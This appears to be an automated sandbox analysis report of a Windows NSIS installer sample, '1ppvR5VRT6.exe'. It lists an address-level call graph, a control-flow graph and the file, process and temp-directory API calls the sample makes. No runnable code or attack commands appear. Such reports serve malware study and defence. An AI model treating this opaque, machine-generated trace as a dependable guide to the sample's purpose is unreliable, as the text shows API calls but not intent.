4300->4304 4301 40366b lstrcatA 4301->4300 4302->4286 4302->4305 4307 403697 4304->4307 4308 40369e 4304->4308 4309 40140b 2 API calls 4305->4309 4306 40360a 4463 406099 lstrcpynA 4306->4463 4477 405686 CreateDirectoryA 4307->4477 4482 405703 CreateDirectoryA 4308->4482 4309->4286 4314 4036a3 SetCurrentDirectoryA 4315 4036b2 4314->4315 4316 4036bd 4314->4316 4485 406099 lstrcpynA 4315->4485 4439 406099 lstrcpynA 4316->4439 4319 4060bb 17 API calls 4320 4036fc DeleteFileA 4319->4320 4321 403709 CopyFileA 4320->4321 4326 4036cb 4320->4326 4321->4326 4322 403751 4324 405e78 36 API calls 4322->4324 4324->4272 4325 4060bb 17 API calls 4325->4326 4326->4319 4326->4322 4326->4325 4328 40373d CloseHandle 4326->4328 4440 405e78 MoveFileExA 4326->4440 4444 405738 CreateProcessA 4326->4444 4328->4326 4330 4063e5 wsprintfA LoadLibraryExA 4329->4330 4330->4243 4333 406457 GetProcAddress 4332->4333 4334 40644d 4332->4334 4336 403380 4333->4336 4335 4063c3 3 API calls 4334->4335 4337 406453 4335->4337 4336->4247 4337->4333 4337->4336 4338->4253 4339->4255 4341 406303 5 API calls 4340->4341 4343 4032e8 4341->4343 4342 4032f2 4342->4262 4343->4342 4486 405a31 lstrlenA CharPrevA 4343->4486 4346 405703 2 API calls 4347 403300 4346->4347 4348 405c61 2 API calls 4347->4348 4349 40330b 4348->4349 4349->4262 4489 405c32 GetFileAttributesA CreateFileA 4350->4489 4352 402ddb 4379 402de8 4352->4379 4490 406099 lstrcpynA 4352->4490 4354 402dfe 4491 405a78 lstrlenA 4354->4491 4358 402e0f GetFileSize 4359 402f10 4358->4359 4361 402e26 4358->4361 4496 402cf9 4359->4496 4361->4359 4365 402fab 4361->4365 4371 402cf9 32 API calls 4361->4371 4361->4379 4527 4032af 4361->4527 4364 402f53 GlobalAlloc 4368 402f6a 4364->4368 4366 402cf9 32 API calls 4365->4366 4366->4379 4372 405c61 2 API calls 4368->4372 4369 402f34 4370 4032af ReadFile 4369->4370 4374 402f3f 4370->4374 4371->4361 4373 402f7b CreateFileA 4372->4373 4375 402fb5 4373->4375 4373->4379 4374->4364 4374->4379 4511 4032c5 SetFilePointer 4375->4511 4377 402fc3 4512 40303e 4377->4512 4379->4270 4379->4379 4381 406431 5 API calls 4380->4381 4382 4038fd 4381->4382 4383 403903 4382->4383 4384 403915 4382->4384 4576 405ff7 wsprintfA 4383->4576 4385 405f80 3 API calls 4384->4385 4386 403940 4385->4386 4388 40395e lstrcatA 4386->4388 4390 405f80 3 API calls 4386->4390 4389 403913 4388->4389 4561 403bae 4389->4561 4390->4388 4393 405b1f 18 API calls 4394 403990 4393->4394 4395 403a19 4394->4395 4397 405f80 3 API calls 4394->4397 4396 405b1f 18 API calls 4395->4396 4398 403a1f 4396->4398 4399 4039bc 4397->4399 4400 403a2f LoadImageA 4398->4400 4401 4060bb 17 API calls 4398->4401 4399->4395 4404 4039d8 lstrlenA 4399->4404 4408 405a5c CharNextA 4399->4408 4402 403ad5 4400->4402 4403 403a56 RegisterClassA 4400->4403 4401->4400 4407 40140b 2 API calls 4402->4407 4405 403adf 4403->4405 4406 403a8c SystemParametersInfoA CreateWindowExA 4403->4406 4409 4039e6 lstrcmpiA 4404->4409 4410 403a0c 4404->4410 4405->4272 4406->4402 4411 403adb 4407->4411 4412 4039d6 4408->4412 4409->4410 4413 4039f6 GetFileAttributesA 4409->4413 4414 405a31 3 API calls 4410->4414 4411->4405 4416 403bae 18 API calls 4411->4416 4412->4404 4415 403a02 4413->4415 4417 403a12 4414->4417 4415->4410 4419 405a78 2 API calls 4415->4419 4420 403aec 4416->4420 4577 406099 lstrcpynA 4417->4577 4419->4410 4421 403af8 ShowWindow 4420->4421 4422 403b7b 4420->4422 4423 4063c3 3 API calls 4421->4423 4569 405292 OleInitialize 4422->4569 4426 403b10 4423->4426 4425 403b81 4428 403b85 4425->4428 4429 403b9d 4425->4429 4427 403b1e GetClassInfoA 4426->4427 4430 4063c3 3 API calls 4426->4430 4432 403b32 GetClassInfoA RegisterClassA 4427->4432 4433 403b48 DialogBoxParamA 4427->4433 4428->4405 4434 40140b 2 API calls 4428->4434 4431 40140b 2 API calls 4429->4431 4430->4427 4431->4405 4432->4433 4435 40140b 2 API calls 4433->4435 4434->4405 4435->4405 4437 406431 5 API calls 4436->4437 4438 40365a lstrcatA 4437->4438 4438->4300 4438->4301 4439->4326 4441 405e8c 4440->4441 4443 405e99 4440->4443 4579 405d08 4441->4579 4443->4326 4445 405777 4444->4445 4446 40576b CloseHandle 4444->4446 4445->4326 4446->4445 4447->4260 4613 406099 lstrcpynA 4448->4613 4450 405b30 4614 405aca CharNextA CharNextA 4450->4614 4453 4035fb 4453->4272 4462 406099 lstrcpynA 4453->4462 4454 406303 5 API calls 4457 405b46 4454->4457 4455 405b71 lstrlenA 4456 405b7c 4455->4456 4455->4457 4459 405a31 3 API calls 4456->4459 4457->4453 4457->4455 4458 40639c 2 API calls 4457->4458 4461 405a78 2 API calls 4457->4461 4458->4457 4460 405b81 GetFileAttributesA 4459->4460 4460->4453 4461->4455 4462->4306 4463->4276 4465 403812 4464->4465 4466 403808 CloseHandle 4464->4466 4467 403826 4465->4467 4468 40381c CloseHandle 4465->4468 4466->4465 4620 403854 4467->4620 4468->4467 4474 4057ca 4473->4474 4475 40364d ExitProcess 4474->4475 4476 4057de MessageBoxIndirectA 4474->4476 4476->4475 4478 40369c 4477->4478 4479 4056d7 GetLastError 4477->4479 4478->4314 4479->4478 4480 4056e6 SetFileSecurityA 4479->4480 4480->4478 4481 4056fc GetLastError 4480->4481 4481->4478 4483 405713 4482->4483 4484 405717 GetLastError 4482->4484 4483->4314 4484->4483 4485->4316 4487 4032fa 4486->4487 4488 405a4b lstrcatA 4486->4488 4487->4346 4488->4487 4489->4352 4490->4354 4492 405a85 4491->4492 4493 402e04 4492->4493 4494 405a8a CharPrevA 4492->4494 4495 406099 lstrcpynA 4493->4495 4494->4492 4494->4493 4495->4358 4497 402d07 4496->4497 4498 402d1f 4496->4498 4501 402d10 DestroyWindow 4497->4501 4502 402d17 4497->4502 4499 402d27 4498->4499 4500 402d2f GetTickCount 4498->4500 4531 40646d 4499->4531 4500->4502 4504 402d3d 4500->4504 4501->4502 4502->4364 4502->4379 4530 4032c5 SetFilePointer 4502->4530 4505 402d72 CreateDialogParamA ShowWindow 4504->4505 4506 402d45 4504->4506 4505->4502 4506->4502 4535 402cdd 4506->4535 4508 402d53 wsprintfA 4509 4051c0 24 API calls 4508->4509 4510 402d70 4509->4510 4510->4502 4511->4377 4513 403069 4512->4513 4514 40304d SetFilePointer 4512->4514 4538 403146 GetTickCount 4513->4538 4514->4513 4517 405caa ReadFile 4518 403089 4517->4518 4519 403146 42 API calls 4518->4519 4521 403106 4518->4521 4520 4030a0 4519->4520 4520->4521 4522 40310c ReadFile 4520->4522 4524 4030af 4520->4524 4521->4379 4522->4521 4524->4521 4525 405caa ReadFile 4524->4525 4551 405cd9 WriteFile 4524->4551 4525->4524 4528 405caa ReadFile 4527->4528 4529 4032c2 4528->4529 4529->4361 4530->4369 4532 40648a PeekMessageA 4531->4532 4533 406480 DispatchMessageA 4532->4533 4534 40649a 4532->4534 4533->4532 4534->4502 4536 402cec 4535->4536 4537 402cee MulDiv 4535->4537 4536->4537 4537->4508 4539 403174 4538->4539 4540 40329e 4538->4540 4553 4032c5 SetFilePointer 4539->4553 4541 402cf9 32 API calls 4540->4541 4548 403070 4541->4548 4543 40317f SetFilePointer 4547 4031a4 4543->4547 4544 4032af ReadFile 4544->4547 4546 402cf9 32 API calls 4546->4547 4547->4544 4547->4546 4547->4548 4549 405cd9 WriteFile 4547->4549 4550 40327f SetFilePointer 4547->4550 4554 406576 4547->4554 4548->4517 4548->4521 4549->4547 4550->4540 4552 405cf7 4551->4552 4552->4524 4553->4543 4555 4065a3 4554->4555 4556 40659b 4554->4556 4555->4556 4557 406633 GlobalAlloc 4555->4557 4558 40662a GlobalFree 4555->4558 4559 4066a1 GlobalFree 4555->4559 4560 4066aa GlobalAlloc 4555->4560 4556->4547 4557->4555 4557->4556 4558->4557 4559->4560 4560->4555 4560->4556 4562 403bc2 4561->4562 4578 405ff7 wsprintfA 4562->4578 4564 403c33 4565 403c67 18 API calls 4564->4565 4567 403c38 4565->4567 4566 40396e 4566->4393 4567->4566 4568 4060bb 17 API calls 4567->4568 4568->4567 4570 4041a6 SendMessageA 4569->4570 4573 4052b5 4570->4573 4571 4041a6 SendMessageA 4572 4052ee OleUninitialize 4571->4572 4572->4425 4574 401389 2 API calls 4573->4574 4575 4052dc 4573->4575 4574->4573 4575->4571 4576->4389 4577->4395 4578->4564 4580 405d54 GetShortPathNameA 4579->4580 4581 405d2e 4579->4581 4583 405e73 4580->4583 4584 405d69 4580->4584 4606 405c32 GetFileAttributesA CreateFileA 4581->4606 4583->4443 4584->4583 4586 405d71 wsprintfA 4584->4586 4585 405d38 CloseHandle GetShortPathNameA 4585->4583 4587 405d4c 4585->4587 4588 4060bb 17 API calls 4586->4588 4587->4580 4587->4583 4589 405d99 4588->4589 4607 405c32 GetFileAttributesA CreateFileA 4589->4607 4591 405da6 4591->4583 4592 405db5 GetFileSize GlobalAlloc 4591->4592 4593 405dd7 4592->4593 4594 405e6c CloseHandle 4592->4594 4595 405caa ReadFile 4593->4595 4594->4583 4596 405ddf 4595->4596 4596->4594 4608 405b97 lstrlenA 4596->4608 4599 405df6 lstrcpyA 4602 405e18 4599->4602 4600 405e0a 4601 405b97 4 API calls 4600->4601 4601->4602 4603 405e4f SetFilePointer 4602->4603 4604 405cd9 WriteFile 4603->4604 4605 405e65 GlobalFree 4604->4605 4605->4594 4606->4585 4607->4591 4609 405bd8 lstrlenA 4608->4609 4610 405be0 4609->4610 4611 405bb1 lstrcmpiA 4609->4611 4610->4599 4610->4600 4611->4610 4612 405bcf CharNextA 4611->4612 4612->4609 4613->4450 4615 405ae5 4614->4615 4617 405af5 4614->4617 4616 405af0 CharNextA 4615->4616 4615->4617 4619 405b15 4616->4619 4618 405a5c CharNextA 4617->4618 4617->4619 4618->4617 4619->4453 4619->4454 4621 403862 4620->4621 4622 40382b 4621->4622 4623 403867 FreeLibrary GlobalFree 4621->4623 4624 405861 4622->4624 4623->4622 4623->4623 4625 405b1f 18 API calls 4624->4625 4626 405881 4625->4626 4627 4058a0 4626->4627 4628 405889 DeleteFileA 4626->4628 4630 4059ce 4627->4630 4664 406099 lstrcpynA 4627->4664 4629 40362e OleUninitialize 4628->4629 4629->4283 4629->4284 4630->4629 4637 40639c 2 API calls 4630->4637 4632 4058c6 4633 4058d9 4632->4633 4634 4058cc lstrcatA 4632->4634 4636 405a78 2 API calls 4633->4636 4635 4058df 4634->4635 4639 4058ed lstrcatA 4635->4639 4641 4058f8 lstrlenA FindFirstFileA 4635->4641 4636->4635 4638 4059f2 4637->4638 4638->4629 4640 4059f6 4638->4640 4639->4641 4642 405a31 3 API calls 4640->4642 4641->4630 4647 40591c 4641->4647 4643 4059fc 4642->4643 4645 405819 5 API calls 4643->4645 4644 405a5c CharNextA 4644->4647 4646 405a08 4645->4646 4648 405a22 4646->4648 4649 405a0c 4646->4649 4647->4644 4650 4059ad FindNextFileA 4647->4650 4656 40596e 4647->4656 4665 406099 lstrcpynA 4647->4665 4652 4051c0 24 API calls 4648->4652 4649->4629 4654 4051c0 24 API calls 4649->4654 4650->4647 4653 4059c5 FindClose 4650->4653 4652->4629 4653->4630 4655 405a19 4654->4655 4657 405e78 36 API calls 4655->4657 4656->4650 4659 405861 60 API calls 4656->4659 4661 4051c0 24 API calls 4656->4661 4662 4051c0 24 API calls 4656->4662 4663 405e78 36 API calls 4656->4663 4666 405819 4656->4666 4660 405a20 4657->4660 4659->4656 4660->4629 4661->4650 4662->4656 4663->4656 4664->4632 4665->4647 4674 405c0d GetFileAttributesA 4666->4674 4669 405846 4669->4656 4670 405834 RemoveDirectoryA 4672 405842 4670->4672 4671 40583c DeleteFileA 4671->4672 4672->4669 4673 405852 SetFileAttributesA 4672->4673 4673->4669 4675 405825 4674->4675 4676 405c1f SetFileAttributesA 4674->4676 4675->4669 4675->4670 4675->4671 4676->4675 5516 401490 5517 4051c0 24 API calls 5516->5517 5518 401497 5517->5518 5519 401d95 GetDC 5520 402a9f 17 API calls 5519->5520 5521 401da7 GetDeviceCaps MulDiv ReleaseDC 5520->5521 5522 402a9f 17 API calls 5521->5522 5523 401dd8 5522->5523 5524 4060bb 17 API calls 5523->5524 5525 401e15 CreateFontIndirectA 5524->5525 5526 402577 5525->5526 5527 10001058 5529 10001074 5527->5529 5528 100010dc 5529->5528 5530 100014bb GlobalFree 5529->5530 5531 10001091 5529->5531 5530->5531 5532 100014bb GlobalFree 5531->5532 5533 100010a1 5532->5533 5534 100010b1 5533->5534 5535 100010a8 GlobalSize 5533->5535 5536 100010b5 GlobalAlloc 5534->5536 5538 100010c6 5534->5538 5535->5534 5537 100014e2 3 API calls 5536->5537 5537->5538 5539 100010d1 GlobalFree 5538->5539 5539->5528 5547 401d1a 5548 402a9f 17 API calls 5547->5548 5549 401d28 SetWindowLongA 5548->5549 5550 402951 5549->5550 5551 40491b 5552 404947 5551->5552 5553 40492b 5551->5553 5554 40497a 5552->5554 5555 40494d SHGetPathFromIDListA 5552->5555 5562 405799 GetDlgItemTextA 5553->5562 5557 404964 SendMessageA 5555->5557 5558 40495d 5555->5558 5557->5554 5560 40140b 2 API calls 5558->5560 5559 404938 SendMessageA 5559->5552 5560->5557 5562->5559 4749 40159d 4750 402ac1 17 API calls 4749->4750 4751 4015a4 SetFileAttributesA 4750->4751 4752 4015b6 4751->4752 5568 40149d 5569 4022e1 5568->5569 5570 4014ab PostQuitMessage 5568->5570 5570->5569 4753 401a1e 4754 402ac1 17 API calls 4753->4754 4755 401a27 ExpandEnvironmentStringsA 4754->4755 4756 401a3b 4755->4756 4758 401a4e 4755->4758 4757 401a40 lstrcmpA 4756->4757 4756->4758 4757->4758 5571 40171f 5572 402ac1 17 API calls 5571->5572 5573 401726 SearchPathA 5572->5573 5574 401741 5573->5574 5575 100010e0 5578 1000110e 5575->5578 5576 100011c4 GlobalFree 5577 100012ad 2 API calls 5577->5578 5578->5576 5578->5577 5579 100011c3 5578->5579 5580 100011ea GlobalFree 5578->5580 5581 10001266 2 API calls 5578->5581 5582 10001155 GlobalAlloc 5578->5582 5583 100012d1 lstrcpyA 5578->5583 5584 100011b1 GlobalFree 5578->5584 5579->5576 5580->5578 5581->5584 5582->5578 5583->5578 5584->5578 5585 10002162 5586 100021c0 5585->5586 5588 100021f6 5585->5588 5587 100021d2 GlobalAlloc 5586->5587 5586->5588 5587->5586 4776 4042a3 4777 4043c5 4776->4777 4778 4042b9 4776->4778 4779 404434 4777->4779 4784 4044fe 4777->4784 4788 404409 GetDlgItem SendMessageA 4777->4788 4782 40415a 18 API calls 4778->4782 4781 40443e GetDlgItem 4779->4781 4779->4784 4783 4044bc 4781->4783 4787 404454 4781->4787 4785 40430f 4782->4785 4783->4784 4793 4044ce 4783->4793 4786 4041c1 8 API calls 4784->4786 4789 40415a 18 API calls 4785->4789 4791 4044f9 4786->4791 4787->4783 4792 40447a SendMessageA LoadCursorA SetCursor 4787->4792 4813 40417c KiUserCallbackDispatcher 4788->4813 4790 40431c CheckDlgButton 4789->4790 4811 40417c KiUserCallbackDispatcher 4790->4811 4808 404547 4792->4808 4797 4044d4 SendMessageA 4793->4797 4798 4044e5 4793->4798 4797->4798 4798->4791 4802 4044eb SendMessageA 4798->4802 4799 40442f 4814 404523 4799->4814 4800 40433a GetDlgItem 4812 40418f SendMessageA 4800->4812 4802->4791 4805 404350 SendMessageA 4806 404377 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4805->4806 4807 40436e GetSysColor 4805->4807 4806->4791 4807->4806 4817 40577b ShellExecuteExA 4808->4817 4810 4044ad LoadCursorA SetCursor 4810->4783 4811->4800 4812->4805 4813->4799 4815 404531 4814->4815 4816 404536 SendMessageA 4814->4816 4815->4816 4816->4779 4817->4810 4818 401e25 4819 402a9f 17 API calls 4818->4819 4820 401e2b 4819->4820 4821 402a9f 17 API calls 4820->4821 4822 401e37 4821->4822 4823 401e43 ShowWindow 4822->4823 4824 401e4e EnableWindow 4822->4824 4825 402951 4823->4825 4824->4825 5589 406725 5590 4065a9 5589->5590 5591 406f14 5590->5591 5592 406633 GlobalAlloc 5590->5592 5593 40662a GlobalFree 5590->5593 5594 4066a1 GlobalFree 5590->5594 5595 4066aa GlobalAlloc 5590->5595 5592->5590 5592->5591 5593->5592 5594->5595 5595->5590 5595->5591 5596 4064a6 WaitForSingleObject 5597 4064c0 5596->5597 5598 4064d2 GetExitCodeProcess 5597->5598 5599 40646d 2 API calls 5597->5599 5600 4064c7 WaitForSingleObject 5599->5600 5600->5597 5601 4038a7 5602 4038b2 5601->5602 5603 4038b9 GlobalAlloc 5602->5603 5604 4038b6 5602->5604 5603->5604 5605 401f2b 5606 402ac1 17 API calls 5605->5606 5607 401f32 5606->5607 5608 40639c 2 API calls 5607->5608 5609 401f38 5608->5609 5611 401f4a 5609->5611 5612 405ff7 wsprintfA 5609->5612 5612->5611 5613 40292c SendMessageA 5614 402951 5613->5614 5615 402946 InvalidateRect 5613->5615 5615->5614 5623 4026b4 5624 4026ba 5623->5624 5625 402951 5624->5625 5626 4026c2 FindClose 5624->5626 5626->5625 5627 405134 5628 405144 5627->5628 5629 405158 5627->5629 5630 4051a1 5628->5630 5631 40514a 5628->5631 5632 405160 IsWindowVisible 5629->5632 5638 405177 5629->5638 5633 4051a6 CallWindowProcA 5630->5633 5634 4041a6 SendMessageA 5631->5634 5632->5630 5635 40516d 5632->5635 5636 405154 5633->5636 5634->5636 5640 404a8b SendMessageA 5635->5640 5638->5633 5645 404b0b 5638->5645 5641 404aea SendMessageA 5640->5641 5642 404aae GetMessagePos ScreenToClient SendMessageA 5640->5642 5643 404ae2 5641->5643 5642->5643 5644 404ae7 5642->5644 5643->5638 5644->5641 5654 406099 lstrcpynA 5645->5654 5647 404b1e 5655 405ff7 wsprintfA 5647->5655 5649 404b28 5650 40140b 2 API calls 5649->5650 5651 404b31 5650->5651 5656 406099 lstrcpynA 5651->5656 5653 404b38 5653->5630 5654->5647 5655->5649 5656->5653 5657 402736 5658 402ac1 17 API calls 5657->5658 5659 402744 5658->5659 5660 40275a 5659->5660 5661 402ac1 17 API calls 5659->5661 5662 405c0d 2 API calls 5660->5662 5661->5660 5663 402760 5662->5663 5685 405c32 GetFileAttributesA CreateFileA 5663->5685 5665 40276d 5666 402816 5665->5666 5667 402779 GlobalAlloc 5665->5667 5670 402831 5666->5670 5671 40281e DeleteFileA 5666->5671 5668 402792 5667->5668 5669 40280d CloseHandle 5667->5669 5686 4032c5 SetFilePointer 5668->5686 5669->5666 5671->5670 5673 402798 5674 4032af ReadFile 5673->5674 5675 4027a1 GlobalAlloc 5674->5675 5676 4027b1 5675->5676 5677 4027eb 5675->5677 5678 40303e 44 API calls 5676->5678 5679 405cd9 WriteFile 5677->5679 5684 4027be 5678->5684 5680 4027f7 GlobalFree 5679->5680 5681 40303e 44 API calls 5680->5681 5682 40280a 5681->5682 5682->5669 5683 4027e2 GlobalFree 5683->5677 5684->5683 5685->5665 5686->5673 5687 4014b7 5688 4014bd 5687->5688 5689 401389 2 API calls 5688->5689 5690 4014c5 5689->5690 5691 401b39 5692 402ac1 17 API calls 5691->5692 5693 401b40 5692->5693 5694 402a9f 17 API calls 5693->5694 5695 401b49 wsprintfA 5694->5695 5696 402951 5695->5696 4859 40233a 4860 402ac1 17 API calls 4859->4860 4861 40234b 4860->4861 4862 402ac1 17 API calls 4861->4862 4863 402354 4862->4863 4864 402ac1 17 API calls 4863->4864 4865 40235e GetPrivateProfileStringA 4864->4865 4895 4015bb 4896 402ac1 17 API calls 4895->4896 4897 4015c2 4896->4897 4898 405aca 4 API calls 4897->4898 4903 4015ca 4898->4903 4899 401624 4901 401652 4899->4901 4902 401629 4899->4902 4900 405a5c CharNextA 4900->4903 4905 401423 24 API calls 4901->4905 4904 401423 24 API calls 4902->4904 4903->4899 4903->4900 4908 405703 2 API calls 4903->4908 4910 405720 5 API calls 4903->4910 4912 40160c GetFileAttributesA 4903->4912 4913 405686 4 API calls 4903->4913 4906 401630 4904->4906 4909 40164a 4905->4909 4914 406099 lstrcpynA 4906->4914 4908->4903 4910->4903 4911 40163b SetCurrentDirectoryA 4911->4909 4912->4903 4913->4903 4914->4911 5697 4016bb 5698 402ac1 17 API calls 5697->5698 5699 4016c1 GetFullPathNameA 5698->5699 5700 4016d8 5699->5700 5706 4016f9 5699->5706 5703 40639c 2 API calls 5700->5703 5700->5706 5701 402951 5702 40170d GetShortPathNameA 5702->5701 5704 4016e9 5703->5704 5704->5706 5707 406099 lstrcpynA 5704->5707 5706->5701 5706->5702 5707->5706 5708 401d3b GetDlgItem GetClientRect 5709 402ac1 17 API calls 5708->5709 5710 401d6b LoadImageA SendMessageA 5709->5710 5711 402951 5710->5711 5712 401d89 DeleteObject 5710->5712 5712->5711 5713 404b3d GetDlgItem GetDlgItem 5714 404b8f 7 API calls 5713->5714 5721 404da7 5713->5721 5715 404c32 DeleteObject 5714->5715 5716 404c25 SendMessageA 5714->5716 5717 404c3b 5715->5717 5716->5715 5719 404c72 5717->5719 5720 4060bb 17 API calls 5717->5720 5718 404e8b 5723 404f37 5718->5723 5728 404d9a 5718->5728 5729 404ee4 SendMessageA 5718->5729 5722 40415a 18 API calls 5719->5722 5724 404c54 SendMessageA SendMessageA 5720->5724 5721->5718 5732 404a8b 5 API calls 5721->5732 5749 404e18 5721->5749 5727 404c86 5722->5727 5725 404f41 SendMessageA 5723->5725 5726 404f49 5723->5726 5724->5717 5725->5726 5737 404f62 5726->5737 5738 404f5b ImageList_Destroy 5726->5738 5742 404f72 5726->5742 5733 40415a 18 API calls 5727->5733 5730 4041c1 8 API calls 5728->5730 5729->5728 5735 404ef9 SendMessageA 5729->5735 5736 40512d 5730->5736 5731 404e7d SendMessageA 5731->5718 5732->5749 5745 404c94 5733->5745 5734 4050e1 5734->5728 5743 4050f3 ShowWindow GetDlgItem ShowWindow 5734->5743 5739 404f0c 5735->5739 5740 404f6b GlobalFree 5737->5740 5737->5742 5738->5737 5751 404f1d SendMessageA 5739->5751 5740->5742 5741 404d68 GetWindowLongA SetWindowLongA 5744 404d81 5741->5744 5742->5734 5746 404fad 5742->5746 5758 404b0b 4 API calls 5742->5758 5743->5728 5747 404d87 ShowWindow 5744->5747 5748 404d9f 5744->5748 5745->5741 5750 404ce3 SendMessageA 5745->5750 5752 404d62 5745->5752 5756 404d30 SendMessageA 5745->5756 5757 404d1f SendMessageA 5745->5757 5753 404ff1 5746->5753 5761 404fdb SendMessageA 5746->5761 5764 40418f SendMessageA 5747->5764 5765 40418f SendMessageA 5748->5765 5749->5718 5749->5731 5750->5745 5751->5723 5752->5741 5752->5744 5759 4050b7 InvalidateRect 5753->5759 5763 405065 SendMessageA SendMessageA 5753->5763 5756->5745 5757->5745 5758->5746 5759->5734 5760 4050cd 5759->5760 5762 404a46 20 API calls 5760->5762 5761->5753 5762->5734 5763->5753 5764->5728 5765->5721

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 40330d-40334c SetErrorMode GetVersion 1 40334e-403356 call 406431 0->1 2 40335f 0->2 1->2 7 403358 1->7 4 403364-403377 call 4063c3 lstrlenA 2->4 9 403379-403395 call 406431 * 3 4->9 7->2 16 4033a6-403406 #17 OleInitialize SHGetFileInfoA call 406099 GetCommandLineA call 406099 GetModuleHandleA 9->16 17 403397-40339d 9->17 24 403412-403427 call 405a5c CharNextA 16->24 25 403408-40340d 16->25 17->16 21 40339f 17->21 21->16 28 4034ec-4034f0 24->28 25->24 29 4034f6 28->29 30 40342c-40342f 28->30 33 403509-403523 GetTempPathA call 4032dc 29->33 31 403431-403435 30->31 32 403437-40343f 30->32 31->31 31->32 34 403441-403442 32->34 35 403447-40344a 32->35 43 403525-403543 GetWindowsDirectoryA lstrcatA call 4032dc 33->43 44 40357b-403595 DeleteFileA call 402d98 33->44 34->35 37 403450-403454 35->37 38 4034dc-4034e9 call 405a5c 35->38 41 403456-40345c 37->41 42 40346c-403499 37->42 38->28 53 4034eb 38->53 47 403462 41->47 48 40345e-403460 41->48 49 40349b-4034a1 42->49 50 4034ac-4034da 42->50 43->44 61 403545-403575 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4032dc 43->61 58 403629-403639 call 4037f7 OleUninitialize 44->58 59 40359b-4035a1 44->59 47->42 48->42 48->47 55 4034a3-4034a5 49->55 56 4034a7 49->56 50->38 52 4034f8-403504 call 406099 50->52 52->33 53->28 55->50 55->56 56->50 72 40375d-403763 58->72 73 40363f-40364f call 4057b5 ExitProcess 58->73 63 4035a3-4035ae call 405a5c 59->63 64 403619-403620 call 4038e9 59->64 61->44 61->58 76 4035b0-4035d9 63->76 77 4035e4-4035ee 63->77 70 403625 64->70 70->58 74 403765-40377e GetCurrentProcess OpenProcessToken 72->74 75 4037df-4037e7 72->75 79 4037b0-4037be call 406431 74->79 80 403780-4037aa LookupPrivilegeValueA AdjustTokenPrivileges 74->80 82 4037e9 75->82 83 4037ed-4037f1 ExitProcess 75->83 81 4035db-4035dd 76->81 84 4035f0-4035fd call 405b1f 77->84 85 403655-403669 call 405720 lstrcatA 77->85 97 4037c0-4037ca 79->97 98 4037cc-4037d6 ExitWindowsEx 79->98 80->79 81->77 88 4035df-4035e2 81->88 82->83 84->58 94 4035ff-403615 call 406099 * 2 84->94 95 403676-403690 lstrcatA lstrcmpiA 85->95 96 40366b-403671 lstrcatA 85->96 88->77 88->81 94->64 95->58 100 403692-403695 95->100 96->95 97->98 101 4037d8-4037da call 40140b 97->101 98->75 98->101 103 403697-40369c call 405686 100->103 104 40369e call 405703 100->104 101->75 112 4036a3-4036b0 SetCurrentDirectoryA 103->112 104->112 113 4036b2-4036b8 call 406099 112->113 114 4036bd-4036e5 call 406099 112->114 113->114 118 4036eb-403707 call 4060bb DeleteFileA 114->118 121 403748-40374f 118->121 122 403709-403719 CopyFileA 118->122 121->118 124 403751-403758 call 405e78 121->124 122->121 123 40371b-403734 call 405e78 call 4060bb call 405738 122->123 132 403739-40373b 123->132 124->58 132->121 133 40373d-403744 CloseHandle 132->133 133->121
                              APIs
                              • SetErrorMode.KERNELBASE ref: 00403332
                              • GetVersion.KERNEL32 ref: 00403338
                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040336B
                              • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033A7
                              • OleInitialize.OLE32(00000000), ref: 004033AE
                              • SHGetFileInfoA.SHELL32(0041FCF0,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 004033CA
                              • GetCommandLineA.KERNEL32(00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 004033DF
                              • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\1ppvR5VRT6.exe",00000000,?,00000006,00000008,0000000A), ref: 004033F2
                              • CharNextA.USER32(00000000,"C:\Users\user\Desktop\1ppvR5VRT6.exe",00000020,?,00000006,00000008,0000000A), ref: 0040341D
                              • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 0040351A
                              • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 0040352B
                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403537
                              • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 0040354B
                              • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403553
                              • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403564
                              • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040356C
                              • DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403580
                                • Part of subcall function 00406431: GetModuleHandleA.KERNEL32(?,?,?,00403380,0000000A), ref: 00406443
                                • Part of subcall function 00406431: GetProcAddress.KERNEL32(00000000,?), ref: 0040645E
                                • Part of subcall function 00406099: lstrcpynA.KERNEL32(?,?,00000400,004033DF,00423F20,NSIS Error,?,00000006,00000008,0000000A), ref: 004060A6
                                • Part of subcall function 004038E9: lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\skdeskindenes\bromamide\Ozonizing,1033,symphonized: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,symphonized: Installing,00000000,00000002,75A33410), ref: 004039D9
                                • Part of subcall function 004038E9: lstrcmpiA.KERNEL32(?,.exe), ref: 004039EC
                                • Part of subcall function 004038E9: GetFileAttributesA.KERNEL32(Call), ref: 004039F7
                                • Part of subcall function 004038E9: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\skdeskindenes\bromamide\Ozonizing), ref: 00403A40
                                • Part of subcall function 004038E9: RegisterClassA.USER32(00423EC0), ref: 00403A7D
